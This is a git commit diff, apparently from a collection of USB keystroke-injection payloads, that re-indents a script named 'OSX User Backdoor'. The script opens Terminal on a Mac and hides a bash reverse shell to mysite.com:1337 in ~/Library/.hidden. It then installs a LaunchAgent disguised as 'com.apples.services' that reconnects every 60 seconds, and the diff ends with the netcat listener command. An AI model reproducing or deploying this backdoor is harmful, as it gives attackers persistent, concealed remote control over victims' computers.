Updated OSX User Backdoor (asciidoc)

2013-06-25 18:25:51 -07:00 · 2013-06-25 18:25:51 -07:00 · 064a583f0e
parent 74376eae31
commit 064a583f0e
1 changed files with 70 additions and 70 deletions
--- a/OSX-User-Backdoor.asciidoc
+++ b/OSX-User-Backdoor.asciidoc
@ -4,76 +4,76 @@


 REM Patrick Mosca
-REM A simple script for creating a persistent backdoor on OSX.
-REM Change mysite.com to your domain name or IP address
-REM Change 1337 to your port number
-REM Catch the shell with 'nc -l -p 1337'
-REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
-DELAY 1000
-GUI SPACE
-STRING terminal
-DELAY 500
-ENTER
-DELAY 500
-STRING mkdir ~/Library/.hidden
-ENTER
-DELAY 200
-STRING echo '#!/bin/bash
-ENTER
-STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
-ENTER
-STRING wait' > ~/Library/.hidden/connect.sh
-ENTER
-DELAY 500
-STRING chmod +x ~/Library/.hidden/connect.sh
-ENTER
-DELAY 200
-STRING mkdir ~/Library/LaunchAgents
-ENTER
-DELAY 200
-STRING echo '<plist version="1.0">
-ENTER
-STRING <dict>
-ENTER
-STRING <key>Label</key>
-ENTER
-STRING <string>com.apples.services</string>
-ENTER
-STRING <key>ProgramArguments</key>
-ENTER
-STRING <array>
-ENTER
-STRING <string>/bin/sh</string>
-ENTER
-STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
-ENTER
-STRING </array>
-ENTER
-STRING <key>RunAtLoad</key>
-ENTER
-STRING <true/>
-ENTER
-STRING <key>StartInterval</key>
-ENTER
-STRING <integer>60</integer>
-ENTER
-STRING <key>AbandonProcessGroup</key>
-ENTER
-STRING <true/>
-ENTER
-STRING </dict>
-ENTER
-STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
-ENTER
-DELAY 200
-STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
-ENTER
-DELAY 200
-STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
-ENTER
-DELAY 200
-GUI q 
-
+ REM A simple script for creating a persistent backdoor on OSX.
+ REM Change mysite.com to your domain name or IP address
+ REM Change 1337 to your port number
+ REM Catch the shell with 'nc -l -p 1337'
+ REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
+ DELAY 1000
+ GUI SPACE
+ STRING terminal
+ DELAY 500
+ ENTER
+ DELAY 500
+ STRING mkdir ~/Library/.hidden
+ ENTER
+ DELAY 200
+ STRING echo '#!/bin/bash
+ ENTER
+ STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
+ ENTER
+ STRING wait' > ~/Library/.hidden/connect.sh
+ ENTER
+ DELAY 500
+ STRING chmod +x ~/Library/.hidden/connect.sh
+ ENTER
+ DELAY 200
+ STRING mkdir ~/Library/LaunchAgents
+ ENTER
+ DELAY 200
+ STRING echo '<plist version="1.0">
+ ENTER
+ STRING <dict>
+ ENTER
+ STRING <key>Label</key>
+ ENTER
+ STRING <string>com.apples.services</string>
+ ENTER
+ STRING <key>ProgramArguments</key>
+ ENTER
+ STRING <array>
+ ENTER
+ STRING <string>/bin/sh</string>
+ ENTER
+ STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
+ ENTER
+ STRING </array>
+ ENTER
+ STRING <key>RunAtLoad</key>
+ ENTER
+ STRING <true/>
+ ENTER
+ STRING <key>StartInterval</key>
+ ENTER
+ STRING <integer>60</integer>
+ ENTER
+ STRING <key>AbandonProcessGroup</key>
+ ENTER
+ STRING <true/>
+ ENTER
+ STRING </dict>
+ ENTER
+ STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
+ ENTER
+ DELAY 200
+ STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
+ ENTER
+ DELAY 200
+ STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
+ ENTER
+ DELAY 200
+ GUI q 
+ 
 Catch the shell with netcat:

 nc -l -p 1337